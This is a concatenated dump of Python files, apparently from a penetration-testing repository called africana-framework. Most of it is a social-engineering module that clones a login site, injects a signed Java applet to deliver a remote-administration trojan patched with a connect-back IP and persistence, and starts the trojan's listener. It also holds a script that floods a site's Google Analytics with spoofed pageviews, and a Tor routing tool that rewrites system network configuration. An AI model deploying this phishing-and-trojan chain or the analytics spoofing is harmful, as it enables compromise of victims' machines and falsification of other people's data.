customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
| 5,696 | Python | .py | 130 | 36.6 | 182 | 0.593288 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,855 | ratte_module.py | CHEGEBB_africana-framework/externals/set/modules/ratte_module.py | #! /usr/bin/python3
#
# These are required fields
#
import os
import subprocess
from time import sleep
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
try:
import socketserver as SocketServer # Py3
except ImportError:
import SocketServer # Py2
try:
import http.server as SimpleHTTPServer # Py3
except ImportError:
import SimpleHTTPServer # Py2
try:
import _thread as thread # Py3
except ImportError:
import thread # Py2
import src.core.setcore as core
from src.core.menu import text
try:
input = raw_input
except NameError:
pass
definepath = os.getcwd()
userconfigpath = core.userconfigpath
MAIN="RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
# This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.
# This release one is only for education!"
AUTHOR="Thomas Werth"
httpd = None
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server_tw(directory, port):
global httpd
try:
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address in case something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever, ())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle the rest
# except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
def stop_web_server_tw():
global httpd
try:
httpd.socket.close()
# handle the exception
except:
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack_tw(website, port, directory, ipaddr):
# clone the website and inject java applet
core.site_cloner(website, directory, "java")
############################################
    # use the customized RATTE payload
############################################
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
# open the file
# start a loop
with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
for line in fileopen:
# define executable name and rename it
filename = line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
    # TODO: parse index.html and replace IPADDR:port
with open(os.path.join(directory, "index.html"), "rb") as fileopen:
data = fileopen.read()
with open(os.path.join(directory, "index.html"), 'wb') as filewrite:
to_replace = core.grab_ipaddress() + ":80"
# replace 3 times
filewrite.write(data.replace(str(to_replace), ipaddr + ":" + str(port), 3))
# start the web server by running it in the background
start_web_server_tw(directory, port)
#
# Start ratteserver
#
def ratte_listener_start(port):
# launch ratteserver using ../ cause of reports/ subdir
# subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % port, shell=True).wait()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
        # check that customexe is non-empty, otherwise an empty field would be patched (which is wrong)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
# def main(): header is required
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
    # javaport must be 80, because the injected applet downloads its payload over port 80
try:
javaport = int(input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
| 11,046 | Python | .py | 237 | 39.021097 | 272 | 0.605894 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,856 | google_analytics_attack.py | CHEGEBB_africana-framework/externals/set/modules/google_analytics_attack.py | #!/usr/bin/env python3
from __future__ import print_function
print("Loading module. Please wait...")
import src.core.setcore
import sys
import requests
import re
import time
import random
try:
input = raw_input
except NameError:
pass
MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"
### MAIN ###
def main():
print_title()
    # determines whether the mode is automatic or manual, then calls the matching functions
mode_choice = input("[*] Choose mode (automatic/manual): ")
if mode_choice in ("automatic","auto"):
print("\n[*] Entering automatic mode.\n")
url = input("[*] Target website (E.g. 'http://xyz.com/'): ")
params = auto_params(url)
elif mode_choice in ("manual","man"):
print("\n[*] Entering manual mode.")
params = manual_params()
else:
print("\n[-] Invalid mode.\n")
sys.exit()
# params have been collected, prompts for print
print("\n[+] Payload ready.")
printchoice = input("\n[*] Print payload?(y/n): ")
if printchoice == "y":
print_params(params)
#sends request
input("\nPress <enter> to send payload.")
send_spoof(params)
#prompts for loop, calls function if need be
loopchoice = input("\n[*] Send payload on loop?(y/n) ")
if loopchoice == "y":
looper(params)
input("\n\nThis module has finished completing. Press <enter> to continue")
### print_params - loops through params and prints
def print_params(params):
print()
for entry in params:
print(entry + " = " + params[entry])
### looper - prompts for seconds to sleep, starts loop
def looper(params):
secs = input("[*] Seconds between payload sends: ")
input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
while True:
send_spoof(params)
time.sleep(int(secs))
### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
params['cid'] = random.randint(100,999)
r = requests.get('https://www.google-analytics.com/collect', params=params)
print("\n[+] Payload sent.")
print(r.url)
### auto_params - makes request to target site, regexes for params
def auto_params(url):
try: #parses URL for host and page
m = re.search('(https?:\/\/(.*?))\/(.*)',url)
host = str(m.group(1))
page = "/" + str(m.group(3))
except:
print("\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n")
sys.exit()
try: #makes request to target page
r = requests.get(url)
except:
print("\n[-] Unable to reach target website for parsing.\n")
sys.exit()
try: #parses target webpage for title
m = re.search('<title>(.*)<\/title>', r.text)
page_title = str(m.group(1))
except:
print("\n[-] Unable to parse target page for title.\n")
sys.exit()
try: #parses target webpage for tracking id
m = re.search("'(UA-(.*))',", r.text)
tid = str(m.group(1))
except:
print("\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n")
sys.exit()
#builds params dict
params = {}
params['v'] = "1"
params['tid'] = tid
params['cid'] = "555"
params['t'] = "pageview"
params['dh'] = host
params['dp'] = page
params['dt'] = page_title
params['aip'] = "1"
params['dr'] = input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
return params
### manual_params - prompts for all params
def manual_params():
params = {}
params['v'] = "1"
params['tid'] = input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
params['cid'] = "555"
params['t'] = "pageview"
params['aip'] = "1"
params['dh'] = input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
params['dp'] = input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
params['dt'] = input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
params['dr'] = input("[*] Enter referal page to spoof (dr): ")
return params
### print_title - prints title and references
def print_title():
print("\n----------------------------------")
print(" Google Analytics Attack ")
print(" By Tyler Rosonke (@ZonkSec) ")
print("----------------------------------\n")
print("User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n")
print("References:")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n")
| 4,675 | Python | .py | 122 | 33.196721 | 108 | 0.612726 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,857 | vanish.py | CHEGEBB_africana-framework/externals/tor-vanish/vanish.py | #!/usr/bin/python3
import os
import re
import sys
import time
import random
import requests
import subprocess
from signal import signal, SIGINT
def check_os():
if os.name == "nt":
operating_system = "windows"
if os.name == "posix":
operating_system = "posix"
return operating_system
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGREEN = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGREEN = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGREEN = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGREEN = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
color_taken = []
def color(*args):
colors = [bcolors.BLUE, bcolors.PURPLE, bcolors.CYAN, bcolors.DARKCYAN, bcolors.GREEN,
bcolors.YELLOW, bcolors.RED]
if args:
args, = args
return args
else:
if not color_taken: return random.choice(colors)
else:
return random.choice(list(set(colors).difference(color_taken)))
check_os()
def sudo():
if not os.geteuid() == 0:
sys.exit(color() + "I'm afraid I need some superuser privilages, Start with 'sudo'. Jesus Loves You ¯\(ツ)/¯" + bcolors.ENDC)
def handler(signal_received, frame):
print(color() + bcolors.BOLD + "\nCTRL-C detected. Exiting.... ")
exit(0)
if __name__ == '__main__':
signal(SIGINT, handler)
def logo(*args):
global color_taken
print(bcolors.BLUE + r"""
███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█
████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█
███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█
████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█
███▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
████▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
█████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
█████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
█████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██
█████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██
█████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███
██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███
███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████
███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████
████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████
█████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████
██████████▓▓▓█▓▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬▓███████
███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████
██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████
███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████
""" + bcolors.ENDC)
print(bcolors.GREEN + " ~[ " + color() + "Be strong and of a good courage, fear not, nor be afraid" + bcolors.GREEN + " ]~ " + color() + "\n\n " + bcolors.YELLOW + "~[ " + color() + "Deut.31:6" + bcolors.YELLOW + " ]~" + bcolors.ENDC)
def mask():
try:
mask0 = requests.get('https://icanhazip.com/').text
except requests.exceptions.RequestException:
try:
mask1 = requests.get('https://ipinfo.io/ip').text
return mask1
except requests.exceptions.RequestException as e:
print(f'\n{e}')
sys.exit(color() + """\n Sorry, can't fetch the Details.
Either the site's down or something's up with your internet-config.
You may find solution here :)
https://github.com/Feliz-SZK/Linux-Decoded/blob/master/Fix%20temporary%20failure%20in%20name%20resolution.md""" + bcolors.ENDC)
return mask0
def frag():
fragment = subprocess.Popen("iptables -t nat -L -n", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
frag, defrag = fragment
if defrag: print(f"\n{bcolors.RED}encounterd some problems while checking the iptables-details{bcolors.ENDC}")
return frag.decode("utf-8")
def finesse(langa, resolv_switch):
if langa > 5:
sys.exit(f"\n{color(bcolors.RED)}excceeded no of retries, terminating to prevent memory corruption.{bcolors.ENDC}")
if not os.path.exists('/etc/resolv.conf'):
print(f"\n{color(bcolors.BLUE)}resolv.conf file is missing,", end=" ")
asking = str(input(f"{color(bcolors.BLUE)}you want me to manually create it for you! {bcolors.GREEN}Y/N: {bcolors.ENDC}")).lower().strip()
if asking == 'y':
try:
with open("/etc/resolv.conf", "w") as f:
f.write("nameserver 127.0.0.1")
resolv_switch += 1
print(f"{color()}Done, saved with local dns.{bcolors.ENDC}")
except Exception as e:
print(f"{color(bcolors.RED)}something's wrong, can't write the file.{bcolors.ENDC}\n{e}")
elif asking == "n":
sys.exit(f"{color(bcolors.GREEN)}Roger that, terminating....{bcolors.ENDC}")
else:
langa += 1
return finesse(langa, resolv_switch)
return resolv_switch
torrstring = ['# Generated by africana-framework. Delete at your own risk!', '', 'VirtualAddrNetworkIPv4 10.192.0.0/10', 'AutomapHostsOnResolve 1',
'TransPort 9040 IsolateClientAddr IsolateClientProtocol IsolateDestAddr IsolateDestPort', 'DNSPort 5353', 'CookieAuthentication 1']
resolvstring = '# Generated by africana-framework. Delete at your own risk!\n\nnameserver 127.0.0.1'
def resolv_config(r_switch):
if r_switch == 0:
with open('/etc/resolv.conf') as f:
lines = f.read().splitlines()
if resolvstring not in lines:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
os.system("cp /etc/resolv.conf /etc/resolv.conf.backup_africana")
with open('/etc/resolv.conf', 'w') as rconf:
rconf.write("%s\n" % resolvstring)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
else:
if resolvstring in list(filter(lambda rc: 'nameserver' in rc, lines))[0]:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring Resolv.config {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
time.sleep(0.5)
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
os.system('cp /etc/resolv.conf /etc/resolv.conf.backup_africana')
with open('/etc/resolv.conf', 'w') as rconf:
rconf.write("%s\n" % resolvstring)
print(color(bcolors.RED) + "Done...." + bcolors.ENDC)
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
print(color() + " :) Already Configured" + bcolors.ENDC)
return 0
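# Hedged example (editor's addition, not called anywhere in this tool):
# resolv_config() follows a simple backup-then-overwrite pattern for
# /etc/resolv.conf. The generic helper below sketches the same idea; the
# function name and the backup suffix are illustrative assumptions only.
def _backup_and_write_sketch(path, new_text, backup_suffix=".backup_africana"):
    import os
    import shutil
    if os.path.exists(path):
        # keep a restorable copy next to the original before touching it
        shutil.copy2(path, path + backup_suffix)
    with open(path, "w") as fh:
        fh.write(new_text)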
def configure():
if "vanish" in frag(): sys.exit(f"\n{bcolors.RED} vanish{bcolors.BLUE} is already running....{bcolors.ENDC}")
r_switch = finesse(0, 0)
if os.system("which tor > /dev/null") == 0:
if not os.path.exists('/etc/tor/torrc'):
print(
f"{color(bcolors.RED)}No torrc file is configured.....{bcolors.ENDC}{color(bcolors.GREEN)}Configuring:)")
try:
f = open('/etc/tor/torrc', 'w+')
for elements in torrstring:
f.write("%s\n" % elements)
f.close()
print(f"{color(bcolors.CYAN)}Done....{bcolors.ENDC}")
except Exception as e:
print(f"{color(bcolors.RED)}Failed to write the torrc file{bcolors.ENDC} \n {e}")
sys.exit()
else:
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} Configuring Torrc {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
subprocess.Popen(["cp", "/etc/tor/torrc", "/etc/tor/torrc.bak_africana"], stdout=subprocess.PIPE).communicate()
torrc = open('/etc/tor/torrc', 'w')
for elements in torrstring:
torrc.write("%s\n" % elements)
torrc.close()
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
else:
print(f"\n{bcolors.BLUE} [ {bcolors.RED}tor isn't installed, try 'sudo apt install tor' {bcolors.BLUE} ] {bcolors.ENDC}")
sys.exit()
subprocess.Popen(['service', 'tor', 'restart'])
resolv_config(r_switch)
def terminate():
subprocess.Popen(['service', 'tor', 'stop'])
trigger = 0
if os.path.exists('/etc/resolv.conf.backup_africana'):
trigger += 1
restore = "yes | mv /etc/resolv.conf.backup_africana /etc/resolv.conf"
process = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} reverting to default resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
out, err = process.communicate(restore.encode('utf-8'))
if err:
print('\n' + err.decode('utf8').replace("\n", '\n'))
            print(bcolors.RED + "\nI guess you're messing around; otherwise your system has some serious issues, deleting backups by itself." + bcolors.ENDC)
sys.exit()
time.sleep(0.5)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if os.path.exists('/etc/tor/torrc.bak_africana'):
trigger += 1
torrc_restore = "mv /etc/tor/torrc.bak_africana /etc/tor/torrc"
process = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} dropping of torrc file {bcolors.BLUE} ]{bcolors.ENDC}")
out, err = process.communicate(torrc_restore.encode('utf-8'))
if err:
print("\n" + err.decode('utf8').replace("\n", '\n'))
print(" ")
            print(bcolors.GREEN + "I guess you're messing around; otherwise your system has some serious issues (deleting backups by itself)." + bcolors.ENDC)
sys.exit()
time.sleep(0.5)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if "vanish" in frag():
trigger += 1
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Restoring Iptables rules {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if os.path.exists("/etc/iptables_rules_vanish.bak"):
one, afric = subprocess.Popen('iptables-restore < /etc/iptables_rules_vanish.bak', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
os.remove('/etc/iptables_rules_vanish.bak')
if afric and b"Warning" not in afric:
print(f"{bcolors.RED} can't restore previous rules, seems the file's being tampered with\n{bcolors.RED} {afric.decode('utf-8').strip()}{bcolors.ENDC}")
print(f"{bcolors.GREEN}{bcolors.BOLD}Defaulting..{bcolors.ENDC}")
reset_to_default(overide_pass=True)
else:
reset_to_default(overide_pass=True, reset_as_child_func=True)
time.sleep(1)
if trigger == 0:
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} No instances of tor has been executed {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
sys.exit()
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Cleaning up complete {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.RED} 'Tor services has stoped!!!' {bcolors.BLUE} ]{bcolors.ENDC}")
def torcircuit():
if not 'vanish' in frag():
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} You must start vanish first {bcolors.BLUE} ]{bcolors.ENDC}")
sys.exit()
else:
subprocess.Popen(['service', 'tor', 'reload'])
print(bcolors.GREEN + "\nSrambling Tor Nodes" + bcolors.ENDC)
time.sleep(0.4)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
time.sleep(0.4)
print(bcolors.GREEN + "Your new ip appears to be: " +
bcolors.ENDC + color() + bcolors.BOLD + str(mask()) + bcolors.ENDC)
def tor_stat(e_langa):
try:
resp = requests.get("https://check.torproject.org")
except Exception as e:
e_langa += 1
if e_langa > 2:
print(f"\n{bcolors.BLUE} [ {bcolors.RED} Unable to get the network-details, try Option 5. {bcolors.BLUE}]{bcolors.ENDC}")
sys.exit(1)
print(f"{color(bcolors.ENDC)}\n -[ {color(bcolors.GREEN)}having trouble fetching exit-node details, {color(bcolors.CYAN)}retrying.... {color()} {e_langa}{color(bcolors.ENDC)} ]-{bcolors.ENDC}")
time.sleep(1.2)
return tor_stat(e_langa)
status = re.search(r'<title[^>]*>([^<]+)</title>', resp.text).group(1)
mask = re.search( r'[0-9]+(?:\.[0-9]+){3}', resp.text ).group(0)
print("\n Your Ip address is: " + color() + bcolors.BOLD + mask + bcolors.ENDC)
print(f"{color()}Congratulations, you're using tor :){bcolors.ENDC}") if "Congratulations" in status.strip() else print(f"{color()}{status.strip()}{bcolors.ENDC}")
return 0
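# Hedged example (editor's addition, not wired into the menu): tor_stat()
# scrapes the HTML title of check.torproject.org. Assuming the site's JSON
# endpoint (https://check.torproject.org/api/ip) is still available, the same
# check can be done without regexes, as sketched below for illustration only.
def _tor_stat_json_sketch():
    resp = requests.get("https://check.torproject.org/api/ip", timeout=10)
    info = resp.json()  # expected shape: {"IsTor": <bool>, "IP": "<exit ip>"}
    state = "routed through Tor" if info.get("IsTor") else "NOT using Tor"
    print("Exit IP %s is %s" % (info.get("IP"), state))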
def check_default_rules(shell:bool = True):
